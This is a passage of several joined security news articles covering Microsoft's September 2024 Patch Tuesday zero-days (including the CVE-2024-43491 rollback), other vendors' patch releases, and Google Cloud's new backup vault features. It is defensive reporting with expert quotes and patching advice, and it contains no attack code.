"This means that an attacker could exploit these previously mitigated vulnerabilities on Windows 10, version 1507 (Windows 10 Enterprise 2015 LTSB and Windows 10 IoT Enterprise 2015 LTSB) systems that have installed the Windows security update released on March 12, 2024 — KB5035858 (OS Build 10240.20526) or other updates released until August 2024."

The Windows maker further said it can be resolved by installing the September 2024 Servicing stack update (SSU KB5043936) and the September 2024 Windows security update (KB5043083), in that order.

It's also worth pointing out that Microsoft's "Exploitation Detected" assessment for CVE-2024-43491 stems from the rollback of fixes that addressed vulnerabilities impacting some Optional Components for Windows 10 (version 1507) that have been previously exploited.

"No exploitation of CVE-2024-43491 itself has been detected," the company said. "In addition, the Windows product team at Microsoft discovered this issue, and we have seen no evidence that it is publicly known."

**Software Patches from Other Vendors**

In addition to Microsoft, security updates have also been released by other vendors over the past few weeks to rectify several vulnerabilities, including —

*   Adobe
*   Arm
*   Bosch
*   Broadcom (including VMware)
*   Cisco
*   Citrix
*   CODESYS
*   D-Link
*   Dell
*   Drupal
*   F5
*   Fortinet
*   Fortra
*   GitLab
*   Google Android and Pixel
*   Google Chrome
*   Google Cloud
*   Google Wear OS
*   Hitachi Energy
*   HP
*   HP Enterprise (including Aruba Networks)
*   IBM
*   Intel
*   Ivanti
*   Lenovo
*   Linux distributions Amazon Linux, Debian, Oracle Linux, Red Hat, Rocky Linux, SUSE, and Ubuntu
*   MediaTek
*   Mitsubishi Electric
*   MongoDB
*   Mozilla Firefox, Firefox ESR, Focus and Thunderbird
*   NVIDIA
*   ownCloud
*   Palo Alto Networks
*   Progress Software
*   QNAP
*   Qualcomm
*   Rockwell Automation
*   Samsung
*   SAP
*   Schneider Electric
*   Siemens
*   SolarWinds
*   SonicWall
*   Spring Framework
*   Synology
*   Veeam
*   Zimbra
*   Zoho ManageEngine ServiceDesk Plus, SupportCenter Plus, and ServiceDesk Plus MSP
*   Zoom, and
*   Zyxel

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Issues Patches for 79 Flaws, Including 3 Actively Exploited Windows Flaws

The combination of immutability, indelibility, centralized governance, and user empowerment provides a comprehensive backup strategy, Google said.

Source: Aleksei Gorodenkov via Alamy Stock Photo

Google has announced three enhancements to its Google Cloud Backup and Disaster recovery service to enhance customers' ability to manage backups simply and securely, while boosting agility and reducing the workload on IT teams.

Backup and disaster recovery technologies are key components of ransomware defense. The first enhancement allows users to create backup vault storage systems that cannot be modified or accidentally deleted. Backup vault data is stored in Google-managed projects and "logically air-gapped" from Google Cloud projects, the company stated in a blog post. Compute Engine virtual machines (VMs), VMware Engine VMs, Oracle databases, and SQL Server databases are supported.

Backup vault storage isn’t visible to users inside the organization, preventing direct attacks, and Google manages access through its Google Cloud Backup and DR service application programming interfaces (APIs) and user interface (UI). Users can set vault backup rules on modification and deletion when creating vaults. The backups are fully self-contained, giving users the opportunity for recovery when a source resource is no longer available, helping teams keep production applications online.

Google is also making updates to its centralized backup management system. Its new fully managed service is an integrated, developer-centric, self-service model that allows app developers to back up their VMs while the teams managing storage and backup systems retain governance and oversight. Monitoring and reporting capabilities include scheduled backup jobs and restore jobs, customizable reporting, and alerts and notifications. 

The system, integrated with Google Cloud Identity and Access Management (IAM), lets developers create backups during the creation of Compute Engine VMs so that users have correct data protection policies deployed from the outset of project creation. 

Both products are currently available in preview, Google said. The backup vault feature will be generally available in the coming months. During preview, users will be able to access these features through the UI and Google Cloud CLI to protect Compute Engine VMs. Once it is generally available, users will have access to APIs and Terraform.

**About the Author**

Jennifer Lawinski is a writer and editor with more than 20 years experience in media, covering a wide range of topics including business, news, culture, science, technology and cybersecurity. After earning a Master's degree in Journalism from Boston University, she started her career as a beat reporter for The Daily News of Newburyport. She has since written for a variety of publications including CNN, Fox News, Tech Target, CRN, CIO Insight, MSN News and Live Science. She lives in Brooklyn with her partner and two cats.

Google Updates Cloud Backup, Disaster Recovery Service

Microsoft's September 2024 Patch Tuesday is here. Make sure you’ve applied the necessary patches!

Microsoft September 2024 Patch Tuesday addresses 79 security vulnerabilities, including four actively exploited zero-days. It covers critical flaws in Windows Installer, MoTW, Publisher, and Windows Update.

Microsoft’s September 2024 Patch Tuesday is packed with critical updates, addressing a total of 79 vulnerabilities, including four actively exploited flaws and one publicly disclosed zero-day. Seven of these vulnerabilities were rated as critical, most of which were either remote code execution (RCE) or elevation of privileges (EoP) flaws.

****Highlighting Critical Vulnerabilities********1\. Actively Exploited Vulnerabilities:****

Among the most urgent updates were four vulnerabilities that were being actively exploited by malicious actors. These vulnerabilities represent a major risk to users and organizations that have yet to apply the patches, as they were being used in real-world attacks before the patches were available.

****CVE-2024-38217 – Windows Mark of the Web (MoTW) Security Feature Bypass Vulnerability:****

This critical vulnerability allows attackers to bypass security warnings meant to protect users from opening files from untrusted sources. Attackers can manipulate these security features to deceive users into executing malicious files without triggering the standard MoTW prompts. This vulnerability has previously been linked to ransomware attacks, making it a high-priority fix.

****CVE-2024-43461 – Windows MSHTML Platform Spoofing Vulnerability:****

This vulnerability enables attackers to spoof legitimate web content, which can be leveraged for phishing attacks and unauthorized data theft. This flaw shares similarities with CVE-2024-38112, which was used by advanced persistent threat (APT) groups in zero-day attacks. Given the active exploitation of related vulnerabilities, CVE-2024-43461 has a high likelihood of being used in future attacks.

****2\. Zero-Day Vulnerabilities:********CVE-2024-43491 — Remote Code Execution in Windows Update:****

This critical vulnerability could allow attackers to remotely execute code by exploiting weaknesses in the Windows Update process, gaining control of affected systems.

****CVE-2024-38014 — Elevation of Privilege in Windows Installer:****

This vulnerability allows attackers to gain elevated privileges by exploiting flaws in the Windows Installer, providing them with administrative-level access to compromised systems.

****CVE-2024-38217 — Windows Mark of the Web (MoTW) Bypass Vulnerability:****

Attackers can bypass the security mechanisms of MoTW, which are designed to alert users about harmful files downloaded from the internet, leading to unauthorized code execution.

****CVE-2024-38226 — Microsoft Publisher Security Bypass:****

This flaw allows attackers to exploit the security features in Microsoft Publisher, enabling them to execute malicious code by bypassing standard file protections.

****Critical Vulnerabilities Fixed****

Seven vulnerabilities were marked as critical, primarily involving remote code execution (RCE) or elevation of privilege. These vulnerabilities include:

*   **CVE-2024-43455** – Windows Remote Desktop Protocol (RDP) RCE vulnerability, which could allow attackers to remotely execute code on a compromised system, gaining full control of the machine.
*   **CVE-2024-43456** – Windows Kernel EoP vulnerability, allowing attackers to escalate their privileges on a targeted system, gaining administrative rights.
*   **CVE-2024-43469** – A high-severity remote code execution vulnerability in Azure CycleCloud, allowing attackers to execute arbitrary code with limited privileges. It has a CVSS score of 8.8, making patching critical to prevent exploitation

****Recommendations and Mitigation****

Given the critical nature of many of these vulnerabilities, especially the actively exploited and publicly disclosed flaws, Microsoft strongly recommends that organizations prioritize patch deployment.

**Patch Management:** Enterprises should accelerate their patch management processes to mitigate risks associated with vulnerabilities like CVE-2024-38217 and CVE-2024-43461. These flaws are being actively exploited in the wild, posing substantial risks to unpatched systems.

**User Education:** Beyond technical protection, users must be made aware of the dangers of interacting with untrusted files and websites. This is important in mitigating the MoTW and spoofing vulnerabilities discussed earlier.

The complete list of vulnerabilities, along with guidance on mitigation strategies, can be found here on Microsoft’s official September 2024 Patch Tuesday update.

Saeed Abbasi, Manager of Vulnerability Research at Qualys Threat Research Unit, commented on Microsoft’s September 2024 Patch Tuesday, stressing the importance of applying the updates promptly to mitigate possible risks.

“CVE-2024-38217 vulnerability allows an attacker to manipulate the security warnings that typically inform users about the risks of opening files from unknown or untrusted sources and similar MoTW bypasses have historically been linked to ransomware attacks, where the stakes are high,” Saeed warned.

He further stressed “Given the exploit’s public disclosure and confirmed exploitation, it is a prime vector for cybercriminals to infiltrate corporate networks. Enterprises must prioritize patch management and educate users on the risks of downloading files from untrusted sources to mitigate the exploitation of such vulnerabilities.”  

“The CVE-2024-43461 vulnerability mirrors the patterns of CVE-2024-38112 where the exploitation might be repurposed against CVE-2024-43461 due to the similar attack vectors involved. There exists a high likelihood of exploitation, as this vulnerability enables attackers to spoof legitimate web content, leading to unauthorized actions such as phishing and data theft,” he added.

“This risk is highlighted by past incidents where similar vulnerabilities were actively exploited in the wild, posing substantial security challenges to corporate networks. Given the critical nature of this vulnerability, we recommend fast-tracking patch management processes to mitigate potential impacts,” Saeed advised.

1.  **Mailcow Patches XSS and File Overwrite Flaws – Update NOW**
2.  **Google Patches Flaws in Quick Share After Researchers’ Warning**
3.  **Broadcom: Urgent Patch for Severe VMware vCenter Server Flaws**
4.  **TellYouThePass Ransomware Exploits Critical PHP Flaw, Patch NOW**
5.  **PATCH NOW! Veeam Flaw Puts Thousands of Backup Servers at Risk**

Microsoft September 2024 Patch Tuesday Fixes 79 Flaws, Including 4 Zero-Days

This month's Patch Tuesday contains a total of 79 vulnerabilities — the fourth largest of the year.

Source: CHIEW via Shutterstock

Attackers are already actively exploiting four of the 79 vulnerabilities for which Microsoft issued a patch this week as part of its monthly security update.

Two of the zero-day bugs give attackers a way to bypass critical security protections in Windows and therefore should be at the top of any organization's priority list for remediation.

One of the remaining zero-days is an elevation of privilege flaw that enables access to system-level privileges; the other is a bug that rolled back, or reintroduced, vulnerabilities in certain versions of Windows 10 for which Microsoft had previously issued patches.

In total, Microsoft's September update contained seven critical remote code execution (RCE) and elevation of privilege vulnerabilities. The company assessed 19 of the CVEs in its latest updates as vulnerabilities that attackers are more likely to exploit because they enable remote code execution, involve attacks that are low in complexity, require no user interaction, and exist in widely deployed products, as well as other factors.

**Security Bypass Zero-Days**

One of the security bypass vulnerabilities, tracked as CVE-2024-38226, affects Microsoft Publisher. It allows an attacker with authenticated access to a system to bypass Microsoft Office macros for blocking untrusted and malicious files. "An authenticated attacker could exploit the vulnerability by convincing a victim, through social engineering, to download and open a specially crafted file from a website which could lead to a local attack on the victim computer," Microsoft said. The company gave the vulnerability a moderate CVSS severity score of 6.8 of 10, presumably because an attacker would need to convince a user to open a malicious file in order for any exploit to work.

The other security bypass zero-day bug in Microsoft's September update is CVE-2024-38217, in the Windows Mark of the Web (MoTW) feature that is designed to protect users against potentially harmful files and content downloaded from the Web. The vulnerability allows an attacker to sneak malicious files past MoTW defenses and cause what Microsoft described as "limited loss" of integrity and availability of application reputation checks and other security features. Microsoft assigned CVE-2024-38217 a severity rating of 5 because to exploit it an attacker would need to convince potential victims to visit an attacker-controlled site and then download a malicious file from there.

"Exploitation of both CVE-2024-38226 and CVE-2024-38217 can lead to the bypass of important security features that block Microsoft Office macros from running," Satnam Narang, senior staff research engineer at Tenable, said in a statement. "In both cases, the target needs to be convinced to open a specially crafted file from an attacker-controlled server. Where they differ is that an attacker would need to be authenticated to the system and have local access to it to exploit CVE-2024-38226," he said.

**RCE and Privilege Escalation Zero-Days**

The two other bugs in Microsoft's latest update that attackers are already actively exploiting are CVE-2024-38014 and CVE-2024-43491. CVE-2024-38014 is an elevation of privilege vulnerability in Windows Installer that attackers can use to gain system-level privileges. As with the other zero-days, Microsoft's advisory offered no details on the exploit activity targeting the bug or when it might have started. Despite the ongoing attacks targeting CVE-2024-38014, Microsoft assessed the flaw as only moderately severe (7.8 on 10 on the CVSS scale) because an attacker would already need to have compromised an affected system to exploit the vulnerability.

CVE-2024-43491, meanwhile, is a high-severity (CVSS score 8.5) RCE in Microsoft Windows Update. The vulnerability rolls back fixes that Microsoft issued in March for certain versions of Windows 10. According to Microsoft, the vulnerability gives attackers a way to exploit vulnerabilities that Microsoft previously mitigated in Windows 10, version 1507, between March and August. "Customers need to install both the servicing stack update (KB5043936) AND security update (KB5043083), released on September 10, 2024, to be fully protected from the vulnerabilities that this CVE rolled back," Microsoft said.

Kev Breen, senior director of threat research at Immersive Lab, advocated that administrators pay close attention to Microsoft's Official Notes for CVE-2024-43491. "There are a lot of caveats to this one," Breen said in emailed comments. "The short version is that some versions of Windows 10 with optional components enabled was left in a vulnerable state," since March.

This is the second month in a row where Microsoft has given administrators multiple zero-days to contend with. In August, the company disclosed six of them — equal to the total for the entire year up to that point.

**Other High-Priority Bugs**

Other bugs of note in the latest update according to security researchers include CVE-2024-43461, a Windows spoofing vulnerability; CVE-2024-38018, a Microsoft SharePoint Server RCE; and CVE-2024-38241 and CVE-2024-38242, two elevation-of-privilege vulnerabilities in Kernel Streaming Service Driver.

CVE-2024-43461 affects all supported versions of Microsoft Windows. It is similar to CVE-2024-38112, a zero-day bug that Microsoft patched in July after at least two threat groups had been exploiting it for 18 months. Attackers could leverage the exploits for CVE-2024-38112 in attacks against the new CVE-2024-43416, according to Saeed Abbasi, manager of vulnerability research at Qualys. "There exists a high likelihood of exploitation, as this vulnerability enables attackers to spoof legitimate web content, leading to unauthorized actions such as phishing and data theft," Abbasi said in emailed comments.

Organizations need to prioritize patching the Microsoft SharePoint Server RCE vulnerability (CVE-2024-38018) because no mitigations or workarounds are available for it, said Tom Bowyer, director IT security of Automox, in emailed comments. "The potential impact of this CVE is significant, especially given the business-critical nature SharePoint servers play in organizations that utilize them," and the ease of exploitation.

Ben McCarthy, lead cybersecurity engineer at Immersive Labs, identified the Kernel Streaming Service Driver flaws (CVE-2024-38241 and CE-2024-38242) as important to address because they are present at the kernel level and give attackers a way to bypass security controls, escalate privileges, execute arbitrary code, and take over the whole system.

So far this year, Microsoft has disclosed a total of 745 vulnerabilities across its products, according to numbers maintained by Automox. Microsoft has identified just 33 of them as critical.

Don't miss the latest Dark Reading Confidential podcast, where we talk to two cybersecurity professionals who were arrested in Dallas County, Iowa and forced to spend the night in jail -- just for doing their pen-testing jobs. Listen now!

**About the Author**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Tag

#mac